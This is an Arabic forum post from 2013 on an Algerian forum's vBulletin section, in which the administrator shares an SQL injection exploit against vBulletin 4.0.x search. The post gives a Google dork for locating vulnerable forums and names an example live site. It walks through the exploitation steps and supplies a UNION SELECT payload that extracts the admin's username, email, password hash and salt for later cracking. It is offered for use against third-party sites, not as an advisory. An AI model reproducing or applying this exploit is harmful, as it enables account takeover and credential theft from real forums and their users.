منتديات اللمة الجزائرية
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بزيارة صفحة التعليمـــات، بالضغط هنا. كما يشرفنا أن تقوم بالتسجيل بالضغط هنا إذا رغبت بالمشاركة في المنتدى، أما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.

ادارة المنتدى
منتديات اللمة الجزائرية
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بزيارة صفحة التعليمـــات، بالضغط هنا. كما يشرفنا أن تقوم بالتسجيل بالضغط هنا إذا رغبت بالمشاركة في المنتدى، أما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.

ادارة المنتدى
منتديات اللمة الجزائرية
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات اللمة الجزائرية

منتديات اللمة الجزائرية ترحب بكم
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول
اعوذ بالله من الشيطان الرجيم {اَللَهُ لا إِلَهَ إلا هو اَلحي ُ القَيَوم لا تأخذه سِنَةٌ ولا نوْمٌ لَّهُ مَا فيِِ السَمَاوَاتِ وَمَا في اَلأَرْضِ مَن ذَا الَّذِي يَشفَعُ عِنْدَهُ إِلاَّ بِإِذْنِهِ يَعْلَمُ مَا بَينَ أَيدِيهِمْ ِوَمَا خَلْفَهم وَلا َيُحِيطُونَ بشَيءٍ مِنْ علمِهِ إِلاَ بِمَا شَآء وَسعَ كُرْسِيُّهُ السَمَاوَاتِ وَالأَرضِ وَلاَ يَؤُدُه حِفْظُهُمَا وَهُوَ العَليُّ العَظِيمُ

منتديات اللمة الجزائرية :: قسم تطوير المنتديات vBulletin :: ثغرات الفى بي
 

 ثغرة في منتديات الفي بي vBulletin 4.0.x

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin
Admin


عدد المساهمات : 424
تاريخ التسجيل : 23/07/2012

ثغرة في منتديات الفي بي vBulletin 4.0.x Empty
مُساهمةموضوع: ثغرة في منتديات الفي بي vBulletin 4.0.x   ثغرة في منتديات الفي بي vBulletin 4.0.x Emptyالجمعة أغسطس 23, 2013 9:51 am
اقتباس :
السلام عليكم و رحمة الله و بركاته
بسم الله الرحمن الرحيم

إخواني اليوم جايبلكم ثغرة حقن لقواعد البيانات sql injection في منتديات vBulletin الجيل الرابع الإصدارات الأولى 4.0.x 

الملف المصاب هو socialgroup.php و سكربت البحث searchtools.php

-----------------------------------------------

نجي للمهم 
1- طريقة البحث في العم قوقل ضع هذا الدورك

كود PHP:
الكود:
inurl:"search.php?search_type=1" intext:vbulletin 4  

2-إستغلال الثغرة 

ستجد الكثير من النتائج في قوقل ادخل على واحدة على سبيل المثال

http://forums.millennium.com/search.php?search_type=1

في منتصف الصفحة فوق خانة الكلمة التي سنبحث عنها اذهب إلى

"Search Multiple Content Types" 

ثم ضح صح على خيار groups أو مجموعات

ثم ضع كلمة و ابحث 
ثم الحقن يكون كالتالي
كود PHP:
الكود:
 UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#  

بعد الرابط و النتيجة 
ستظهر لنا اليوزر و إيميل و باسوورد الأدمن مشفر و السالت أي نوع التشفير لأنه مهم لنستطيع فك التشفير

ملاحظة " النسخة 4.1.3 vBulletin لا تحوي هذه الثغرة

دمتم بود و السموحة على التقصير
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://pubarab.123.st
 
ثغرة في منتديات الفي بي vBulletin 4.0.x
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» حل ثغرة في هاك vbseo
» منتديات كريزى انمى | النآفذهٌ الأولىَ لِ آلآنمى ©
» vBulletin 5.0.4 صدرت منذ قليل.
» [TRAIDNT BlUE] أستايل vBulletin Version 3.7.1
» الموسوعة الكاملة لسكريبت Vbulletin للمنتديات

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات اللمة الجزائرية :: قسم تطوير المنتديات vBulletin :: ثغرات الفى بي-
انتقل الى: